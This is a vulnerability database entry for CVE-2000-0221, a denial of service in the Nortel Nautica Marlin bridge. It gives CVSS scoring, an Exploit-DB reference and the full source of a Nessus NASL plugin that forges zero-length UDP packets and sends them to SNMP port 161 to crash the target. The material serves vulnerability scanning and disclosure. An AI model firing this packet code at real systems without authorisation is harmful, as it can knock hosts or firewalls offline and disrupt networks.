Vulnerabilities > CVE-2000-0221 - Unspecified vulnerability in Nortel Nautica Marlin

CVSS 5.0 - MEDIUM

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

NONE

Integrity impact

NONE

Availability impact

PARTIAL

network

low complexity

nortel

nessus

exploit available

NVD

Published: 2000-02-25

Updated: 2008-09-10

Summary

The Nautica Marlin bridge allows remote attackers to cause a denial of service via a zero length UDP packet to the SNMP port.

Vulnerable Configurations

Part	Description	Count
Hardware	Nortel Nortel Nautica Marlin *	1

Exploit-Db

description	Nortel Networks Nautica Marlin Denial of Service Vulnerablility. CVE-2000-0221. Dos exploit for hardware platform
id	EDB-ID:19766
last seen	2016-02-02
modified	2000-02-25
published	2000-02-25
reporter	Christophe GRENIER
source	https://www.exploit-db.com/download/19766/
title	Nortel Networks Nautica Marlin Denial of Service Vulnerablility

Nessus

NASL family	SNMP
NASL id	SNMP_DOS.NASL
description	It was possible to crash either the remote host or the firewall in between us and the remote host by sending an UDP packet of null size going to port 161 (snmp) This flaw may allow an attacker to shut down your network.
last seen	2020-06-01
modified	2020-06-02
plugin id	10266
published	2000-02-24
reporter	This script is Copyright (C) 2000-2019 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/10266
title	SNMP Zero Length UDP Packet Remote DoS
code	# # (C) Tenable Network Security, Inc. # # Thanks to Christophe Grenier <[email protected]> for pointing this out # include("compat.inc"); if (description) { script_id(10266); script_version("1.25"); script_cvs_date("Date: 2019/03/06 18:38:55"); script_cve_id("CVE-2000-0221"); script_bugtraq_id(1009); script_name(english:"SNMP Zero Length UDP Packet Remote DoS"); script_summary(english:"Crashes the remote host by sending a null UDP packet"); script_set_attribute(attribute:'synopsis', value:"The remote host is vulnerable to denial of service."); script_set_attribute(attribute:'description', value: "It was possible to crash either the remote host or the firewall in between us and the remote host by sending an UDP packet of null size going to port 161 (snmp) This flaw may allow an attacker to shut down your network."); script_set_attribute(attribute:'solution', value: "Contact your firewall vendor if it was the firewall which crashed, or filter incoming UDP traffic if the remote host crashed."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2000/02/25"); script_set_attribute(attribute:"plugin_publication_date", value:"2000/02/24"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_KILL_HOST); script_copyright(english:"This script is Copyright (C) 2000-2019 Tenable Network Security, Inc."); script_family(english:"SNMP"); script_require_keys("Settings/ParanoidReport"); exit(0); } include("audit.inc"); include("global_settings.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); if ( TARGET_IS_IPV6 ) exit(0); start_denial(); ip = forge_ip_packet(ip_v : 4, ip_hl : 5, ip_tos : 0, ip_id : 0x4321, ip_len : 28, ip_off : 0, ip_p : IPPROTO_UDP, ip_src : compat::this_host(), ip_ttl : 0x40); # Forge the UDP packet udp = forge_udp_packet( ip : ip, uh_sport : 1234, uh_dport : 161, uh_ulen : 8); # # Send this packet 10 times # send_packet(udp, pcap_active:FALSE) x 10; # # wait # sleep(5); # # And check... # alive = end_denial(); if(!alive) { set_kb_item(name:"Host/dead", value:TRUE); security_warning(port:161, proto:"udp"); }

References

http://www.securityfocus.com/bid/1009